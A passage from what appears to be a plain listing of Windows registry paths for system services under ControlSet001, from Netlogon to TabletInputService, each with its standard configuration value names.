HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Start 